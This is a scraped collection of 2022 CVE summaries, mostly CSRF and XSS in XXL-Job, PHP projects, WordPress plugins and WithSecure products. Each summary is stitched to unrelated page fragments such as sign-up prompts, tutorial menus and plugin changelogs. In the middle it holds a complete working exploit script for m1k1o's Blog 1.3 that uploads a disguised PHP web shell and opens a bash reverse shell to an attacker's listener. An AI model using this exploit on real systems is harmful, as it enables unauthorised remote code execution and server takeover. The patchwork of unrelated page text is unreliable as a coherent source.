A Cross-Site Request Forgery (CSRF) in XXL-Job v2.3.0 allows attackers to arbitrarily create administrator accounts via the component /gaia-job-admin/user/add.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-29002: xxl-job-admin v2.3.0 has a CSRF vulnerability, which can be used to create an administrator account、Modify password, perform task scheduling and other operations · Issue #2821 · xuxueli/xxl-job

Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.

**PHP Data Objects (PDO)**

*   PDO – PHP database extension
*   How to use PDO to insert data into the database?
*   How to use PDO to read data from the database?
*   How to use PDO to update the database?
*   How to delete records?
*   PHP CRUD Operation using PDO Extension
*   Signup and Login operation using PDO
*   Password Hashing in PHP using PDO

**PHP OOP Concepts**

*   Basics Of OOPs in PHP
*   How to create classes and objects?
*   The $this keyword
*   Chaining methods and properties
*   Access modifiers: public vs. private
*   Magic Methods
*   The \_\_construct() magic method
*   Inheritance in PHP
*   Multilevel and Multiple inheritances in PHP

**CodeIgniter**

*   CI Introduction
*   CI Directory Structure
*   CI Controllers
*   CI Model
*   CI View
*   CI Libraries
*   CI Helpers
*   CI Plugins
*   How to create form in CI

**HTML**

*   HTML Introduction
*   HTML Useful Tags
*   HTML Text Formats
*   HTML Links
*   HTML Images
*   HTML Lists
*   HTML Forms
*   HTML Table
*   Content Style in HTML

**MySQL**

*   MySQL Introduction
*   MySQL Command-line
*   MySQL GUI Tools
*   MySQL Users
*   MySQL PHP Connections
*   MySQLi Procedural Functions
*   MySQL Data Type
*   MySQL Database and Tables
*   MySQL Column Modifiers

**Interview QAs**

*   PHP Interview Questions and Answers for Fresher
*   Basic PHP Programs
*   PHP Programming/ Logical Interview questions and answers
*   WordPress Interview Questions and Answers
*   MySQL Interview Question and Answers
*   Common SQL Interview Questions and Answers
*   CodeIgniter Interview Questions and Answers

**WordPress**

*   What is wordpress?
*   WordPress.com vs. WordPress.org
*   WordPress Installation
*   Logging Into Your New WordPress Site
*   WordPress Directory and File Structure
*   WordPress DB Structure & Schema

**PHP with Mysqli**

*   How to Connect PHP with MySQL Database
*   How to insert data into MySql using PHP
*   How to fetch data from MySQL using PHP
*   CRUD operation using PHP and MySQLi
*   User Signup and Sign in using HTML and PHP
*   How to change Password in PHP
*   User login and login tracking using PHP
*   How to check Email and username availability live using jquery/ajax
*   jQuery Dependent DropDown List – States and Districts
*   How to Send Mail Using PHP
*   PHP Email Verification Script
*   How to fetch data in excel or generate excel file in PHP
*   How to prevent Cross-Site Request Forgery (CSRF) in PHP
*   User registration with server-side validation using PHP
*   How to create a Shopping Cart in PHP
*   How to delete multiple records in PHP
*   PHP login with remember me function
*   How to create pagination in PHP
*   How to Create pagination using PHP and MySQLi(with the page number)
*   How to Dynamically Add / Remove input fields in PHP with Jquery Ajax
*   How to send email from localhost using PHP
*   How to use multiple insert queries in PHP
*   CRUD operation with Image Using PHP and MySQLi

**Other PHP Tutorials**

*   Time Ago Script in PHP
*   Get City Country By IP Address in PHP
*   Hit counter in PHP
*   Captcha Image Verification in PHP
*   Server Side form Validation in PHP
*   Date And Time Formatting With PHP
*   How to get Current Indian time in PHP
*   How to get Browser Information In PHP
*   How to convert number to String in PHP
*   How to get current page URL in PHP
*   How to get yesterday and tomorrow date in PHP
*   How to change date format in PHP

As technology keeps updating itself… so do we need to. Advancement in technology is the key to innovation through which you enjoy things you couldn’t a decade ago. Similarly, any Programming language basics keep on updating; it is essential for you to also get trained on all the latest features and the basics while learning a programming language.

PHPGurukul provides you with **PHP Latest tutorials** such as PHP CRUD operations using Procedure or MySQL group, and we keep on adding the latest functionalities tutorials to our website. Apart from these tutorials, we offer some great and usual benefits which will help you in your PHP career, and those are below:

*   You can easily get **PHP Projects Idea** through our website, which you would require when you learn PHP and want to try out something on your own. It all starts with an idea, of course.
*   Our website provides **PHP Tutorials for Students,** and you can also purchase Project reports from PHP gurukul for your submissions in college/universities.
*   Any programming language is tough to learn, but it becomes easier and fun to learn when you start with the basics. Our **PHP Tutorials for beginners** help you to learn from the basics till you learn the advanced concepts of PHP.
*   When you are doing web development apart from scripting languages like HTML, JavaScript, you should also know **PHP oops Concepts,** which are well explained in our tutorials to help you excel in PHP.

PHPGurukul also offers **PHP Projects** available for download in a few and easy steps that you can use directly or can customize as per your needs as PHP is an open-source scripting language. You can opt for free PHP Projects or go for our special Paid PHP Projects with additional features that are good for learning and professional usage.

You can enjoy the tutorials with special advanced concepts, go through Interview Q&A, or download the required PHP Projects with Project reports within no time using our website.

CVE-2022-29004: PHP Project, PHP Projects Ideas, PHP Latest tutorials, PHP oops Concept

Lumidek Associates Simple Food Website 1.0 is vulnerable to Cross Site Request Forgery (CSRF) which allows anyone to takeover admin/moderater account.

Comment

All orders are processed in USD. While the content of your cart is currently displayed in CYN, you will checkout using USD at the most current exchange rate.

**Out of stock**

Some items are no longer available. Your cart has been updated.

Have a Coupon code?

CVE-2022-30014: lumidek.com

m1k1o's Blog versions 1.3 and below suffer from an authenticated remote code execution vulnerability.

    # Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-01-06# Exploit Author: Malte V# Vendor Homepage: https://github.com/m1k1o/blog# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip# Version: 1.3 and below# Tested on: Linux# CVE : CVE-2022-23626import argparseimport jsonimport refrom base64 import b64encodeimport requests as reqfrom bs4 import BeautifulSoupparser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',                    required=False)parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,                    required=False)parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,                    required=False)parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)args = vars(parser.parse_args())username = args['username']password = args['password']lhost_ip = args['ip']lhost_port = args['lport']address = args['url']port = args['port']url = f"http://{address}:{port}"blog_cookie = ""csrf_token = ""exploit_file_name = ""header = {    "Host": f"{address}",    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",    "X-Requested-With": "XMLHttpRequest",    "Csrf-Token": f"{csrf_token}",    "Cookie": f"PHPSESSID={blog_cookie}"}def get_cookie(complete_url):    global blog_cookie    cookie_header = {}    if not blog_cookie:        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"    result = req.get(url=complete_url, headers=cookie_header)    if result.status_code == 200:        blog_cookie = result.cookies.get_dict()['PHPSESSID']        print(f'[+] Found PHPSESSID: {blog_cookie}')        grep_csrf(result)def grep_csrf(result):    global csrf_token    csrf_regex = r"[a-f0-9]{10}"    soup = BeautifulSoup(result.text, 'html.parser')    script_tag = str(soup.findAll('script')[1].contents[0])    csrf_token = re.search(csrf_regex, script_tag).group(0)    print(f'[+] Found CSRF-Token: {csrf_token}')def login(username, password):    get_cookie(url)    login_url = f"{url}/ajax.php"    login_data = f"action=login&nick={username}&pass={password}"    login_header = {        "Host": f"{address}",        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    result = req.post(url=login_url, headers=login_header, data=login_data)    soup = BeautifulSoup(result.text, 'html.parser')    login_content = json.loads(soup.text)    if login_content.get('logged_in'):        print('[*] Successful login')    else:        print('[!] Bad login')def set_cookie(result):    global blog_cookie    blog_cookie = result.cookies.get_dict()['PHPSESSID']def generate_payload(command):    return f"""-----------------------------13148889121752486353560141292Content-Disposition: form-data; name="file"; filename="malicious.gif.php"Content-Type: application/x-httpd-phpGIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;-----------------------------13148889121752486353560141292--"""def send_payload():    payload_header = {        "Host": f"{address}",        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"    payload = generate_payload(command)    print(f"[+] Upload exploit")    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})    set_exploit_file_name(result.content.decode('ascii'))def set_exploit_file_name(data):    global exploit_file_name    file_regex = r"[a-zA-Z0-9]{4,5}.php"    exploit_file_name = re.search(file_regex, data).group(0)def call_malicious_php(file_name):    global header    complete_url = f"{url}/data/i/{file_name}"    print('[*] Calling reverse shell')    result = req.get(url=complete_url)def check_reverse_shell():    yes = {'yes', 'y', 'ye', ''}    no = {'no', 'n'}    choice = input("Have you got an active netcat listener (y/Y or n/N): ")    if choice in yes:        return True    elif choice in no:        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")        return Falsedef main():    enabled_listener = check_reverse_shell()    if enabled_listener:        login(username, password)        send_payload()        call_malicious_php(exploit_file_name)if __name__ == "__main__":    main()

m1k1o's Blog 1.3 Remote Code Execution

Multiple Denial-of-Service vulnerabilities was discovered in the F-Secure Atlant and in certain WithSecure products while scanning fuzzed PE32-bit files cause memory corruption and heap buffer overflow which eventually can crash the scanning engine. The exploit can be triggered remotely by an attacker.

2022-05-23 CVE-2022-28874: Multiple Denial-of-Service (DoS) Vulnerabilities

Multiple denial-of-service (DoS) vulnerabilities while scanning fuzzed PE32-bit files can eventually crash the scanning engine. 

More 2022-04-25 CVE-2022-28871: Denial-of-Service (DoS) Vulnerability

A denial-of-service (DoS) vulnerability in WithSecure component may crash the scanning engine. 

More 2022-04-13 CVE-2022-22965: Vulnerability in Spring Framework Remote Code Execution affect WithSecure Products

A critical vulnerability in the Spring framework affects the following products: F-Secure Policy Manager, F-Secure Policy Manager for Linux, F-Secure Policy Manager Proxy, and F-Secure Elements Connector.

More 2022-03-07 CVE-2021-44750: Arbitrary Code Execution

WithSecure Support Tool (fsdiag) embedded within various WithSecure products for Microsoft Windows can be abused to execute arbitrary commands on the system.

More 2022-03-01 CVE-2021-44749: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser Protection for Android

Vulnerabilities in the browser protection of WithSecure SAFE for Android could allow remote attacker to steal user's sessions cookie.

More 2022-03-01 CVE-2021-44748: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser for Android

Vulnerabilities in the browser of WithSecure SAFE for Android could allow execution of JavaScript. 

More 2022-02-27 CVE-2021-44747: Denial-of-Service (DoS) Vulnerability

Crash while scanning fuzzed files can cause denial-of-service of the antivirus engine.

More 2022-02-07 CVE-2021-40837: Denial-of-Service (DoS) Vulnerability More 2021-12-20 CVE-2021-40836: Denial-of-Service (DoS) Vulnerability More 2021-12-14 CVE-2021-40835: URL Address Bar Spoofing in F-Secure SAFE Browser for iOS More 2021-12-08 CVE-2021-40834: User interface Spoofing in F-Secure SAFE browser for Android More 2021-11-24 CVE-2021-40833: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-40832: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-33603: Denial-of-Service (DoS) Vulnerability More 2021-10-04 CVE-2021-33602: Denial-of-Service (DoS) Vulnerability More 2021-09-26 CVE-2021-33601: Arbitrary Code Execution in Web Interface of F-Secure Internet Gatekeeper More 2021-09-26 CVE-2021-33600: Denial-of-Service Vulnerability in Web Interface of F-Secure Internet Gatekeeper More 2021-09-01 CVE-2021-33599: Denial-of-Service (DoS) Vulnerability More 2021-08-21 CVE-2021-33598: Denial-of-Service (DoS) Vulnerability More 2021-08-09 CVE-2021-33596: Fake Apple Login Prompt in F-Secure SAFE Browser for iOS More 2021-08-09 CVE-2021-33595: F-Secure SAFE Browser for iOS Vulnerable to Address Bar Spoofing More 2021-08-09 CVE-2021-33594: F-Secure SAFE Browser for Android Vulnerable to Address Bar Spoofing More 2021-08-07 CVE-2021-33597: Denial-of-Service (DoS) Vulnerability More 2021-06-01 CVE-2021-33572: Denial-of-Service (DoS) Vulnerability More 2021-01-25 FSC-2021-1: Reflected Cross-Site Scripting Vulnerability in F-Secure Cloud Protection for Salesforce More 2020-11-10 FSC-2020-3: Multiple Buffer Overflow Vulnerabilities in F-Secure Linux Security

Multiple buffer overflow vulnerabilities can lead local privilege escalation.

More 2020-05-17 FSC-2020-2: Local Non-Root User Can Rename or Delete System FIles in Linux Security

A local user can rename or delete arbitrary files owned by root in Linux Security.

More 2020-05-17 FSC-2020-1: CSRF Vulnerability in Web Interface of Linux Security

Vulnerability in web user interface of the F-Secure Linux Security can lead to remotely disable product settings.

More

CVE-2022-28874: Security advisories

Cross-Site Request Forgery (CSRF) vulnerability in KubiQ CPT base plugin <= 5.8 at WordPress allows an attacker to delete the CPT base.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Remove custom post type base slug from url

*   possibility to select specific custom post type(s)
*   auto redirect old slugs to no-base slugs

1.  Upload remove-cpt-base directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

I easily removed the services slug from the link

Very simple plugin, but works perfectly! 🎉

A simple but efficient plugin that works like charm... 🙂

couldnt get the slug remove done with custom code on one particular site for whatever reason ... but this little thing works flawlessly! thanks - please keep it up!! 🙂

Read all 18 reviews

“Remove CPT base” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**5.9**

*   added nonce and security checks

**5.8**

*   tested on WP 5.9

**5.7**

*   tested on WP 5.5
*   minor fix

**5.6**

*   tested again with WPML, Polylang and Custom Post Type Permalinks and fixed

**5.5**

*   tested on WP 5.5
*   another fix for Custom Post Type Permalinks plugin

**5.4**

*   enable previews for CPTs without base

**5.3**

*   make it works with WPML
*   make it works with Polylang
*   make it works with Custom Post Type Permalinks plugin

**5.2**

*   tested on WP 5.4

**5.1**

*   removed auto-prevent slug duplicates
*   removed debug mode
*   removed remove\_cpt\_base\_skip filter
*   use default WP function instead of custom
*   make it works for custom rewrite slugs
*   prioritize page and post like WP does

**5.0**

*   YOU HAVE TO SAVE YOUR SETTINGS AGAIN, because:
*   added alternation option for each post type separately
*   added debug mode

**4.8**

*   fix alternative CPT children solving for nested children

**4.7**

*   alternative CPT children solving

**4.6**

*   fix server port redirect

**4.5**

*   make it works for WP installations in directory

**4.4**

*   minor changes

**4.3**

*   fix for some endpoints and make sure post is not interpreted as attachment

**4.2**

*   fix for hierarchical CPTs on some servers

**4.1**

*   make it works for posts interpreted like category by WP

**4.0**

*   tested on WP 5.2
*   make it works for hierarchical post types and different permalink structures
*   going back to ‘pre\_get\_posts’
*   optimize generating slug for duplicate names

**3.3**

*   change HTTP code from 404 to 200

**3.2**

*   fix for query strings

**3.1**

*   add custom endpoint rewrites support

**3.0**

*   stop using complicated ‘pre\_get\_posts’ and handle 404 instead

**2.3**

*   tested on WP 5.0

**2.2**

*   fix 404

**2.1**

*   fix redirect loop in WPML and WooCommerce

**2.0**

*   stop using .htaccess rules

**1.2**

*   auto init after permalinks updated

**1.1**

*   add uninstall hook
*   add duplicate slug check
*   minor updates

**1.0**

*   First version

CVE-2022-29431: Remove CPT base

Cross-Site Scripting (XSS) vulnerability in KubiQ's PNG to JPG plugin <= 4.0 at WordPress via Cross-Site Request Forgery (CSRF). Vulnerable parameter &jpg_quality.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Convert PNG images to JPG, free up web space and speed up your webpage

*   set quality of converted JPG
*   auto convert on upload
*   auto convert on upload only when PNG has no transparency
*   only convert image if JPG filesize is lower than PNG filesize
*   leave original PNG images on the server
*   convert existing PNG image to JPG
*   bulk convert existing PNG images to JPG
*   conversion statistics

1.  Upload png-to-jpg directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

Best work, fast speed when png convert to jpg

I had a client site where the developers used ALL PNG IMAGES and it was SLOW. Thank you for this awesome plugin you saved me a ton of time not having to convert manually & re-upload via GIMP!

Easy to use and efficient. The bulk convert page loads fast, the images were generated and replaced neatly. I saved over 80MB converting approximately 350 PNGs, and this was only a test run. Lovely plugin!

The plugin converts the format and replaces the address in the database well and without any problems. Be sure to back up before use to avoid problems

I used it on WordPress 5.7.1. The plugin does what it should do. Converting 200 images took about 3 minutes. I hope it will be updated soon. Using old plugins is always a bit scary.

Плагин нашел лишь малую часть моих PNG. Затем заменил полноразмерные png на jpg при этом они все исчезли из тех записей где стояли. Также (!) уменьшенные варианты этих же изображений ОН ОСТАВИЛ В ТОМ ЖЕ ФОРМАТЕ PNG. Таким образом были убиты самые большие PNG и больше ничего не изменилось. Я это делал птому что у меня есть backup сайта 🙂

Read all 32 reviews

“PNG to JPG” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**4.1**

*   added nonce and security checks
*   added button to stop transparency detection or conversion process
*   removed DB prefix from notice table names to make it more readable
*   remove preview box flex centering to make it works with bigger images
*   auto delete PNG backup when JPG deleted in admin

**4.0**

*   replace images also in post\_excerpt
*   separate SQL queries
*   added support for FV Player plugin

**3.9.1**

*   tested on WP 5.9
*   check if file really exists and if has .png extension

**3.9**

*   fix transparency default state

**3.8**

*   tested on WP 5.4
*   save transparency meta and load it instantly next time
*   image viewer – background switch
*   image viewer – centered image
*   image viewer – highlight image borders and show image size on hover

**3.7**

*   do not run second transparency detection if first one return true

**3.6**

*   metadata update fix

**3.5**

*   added support for Broken Link Checker plugin ( blc\_instances, blc\_links )

**3.4**

*   replace image url also in these database tables: yoast\_seo\_links, revslider\_static\_slides

**3.3**

*   tested on WP 5.2
*   handle duplicate names like WP – adding increment
*   optimizing code for faster processing

**3.2**

*   added support for Fancy Product Designer plugin

**3.1**

*   tested on WP 5.0
*   small cosmetic code changes

**3.0**

*   new option: convert only if JPG will have lower filesize then PNG
*   new feature: show converted images statistics
*   fix: conflict when there is already JPEG with a same name as PNG
*   fix: conflict when PNG name is part of another PNG name ( eg. ‘xyz.png’ can rename also ‘abcxyz.png’ )
*   optimized for translations

**2.6**

*   rename PNG image if JPG with the same name already exists

**2.5**

*   BUG FIXED – disabled checkboxes when autodetect is disabled

**2.4**

*   now you can disable autodetect PNG transparency

**2.3**

*   WP 4.9.1 compatibility check
*   new compatibility with Toolset Types

**2.2**

*   Repair revslider database table detection

**2.1**

*   Added option to leave original PNG image on server after conversion
*   Repair SQL replacement query

**2.0**

*   Replace image and thumbnails extension in database tables
*   Moved from Settings to Tools submenu
*   Some small fixes

**1.2**

*   Fix generating background for transparent images (thanks @darkcobalt)

**1.1**

*   Fix PNG transparency detection

**1.0**

*   First version

CVE-2022-29430: PNG to JPG

Cross-Site Request Forgery (CSRF) vulnerability in Aftab Muni's Disable Right Click For WP plugin <= 1.1.6 at WordPress.

**disable-right-click-for-wp**

**Software**

**Disable Right Click For WP**

**Vulnerable Versions**

**<= 1.1.6**

**Fixed in version**

**CVE**

**CVE-2022-29427**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-05-04**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability discovered by Rasi Afeef (Patchstack Alliance) in WordPress Disable Right Click For WP plugin (versions <= 1.1.6).**

**Solution**

**No patched version is available. No reply from the vendor.**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-29427: WordPress Disable Right Click For WP plugin <= 1.1.6 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in ibericode's MC4WP plugin <= 4.8.6 at WordPress.

CVE-2021-36833: MC4WP: Mailchimp for WordPress

GoCD is a continuous delivery server. GoCD versions 19.11.0 through 21.4.0 (inclusive) are vulnerable to a Document Object Model (DOM)-based cross-site scripting attack via a pipeline run's Stage Details > Graphs tab. It is possible for a malicious script on a attacker-hosted site to execute script that will run within the user's browser context and GoCD session via abuse of a messaging channel used for communication between with the parent page and the stage details graph's iframe. This could allow an attacker to steal a GoCD user's session cookies and/or execute malicious code in the user's context. This issue is fixed in GoCD 22.1.0. There are currently no known workarounds.

Tag

#csrf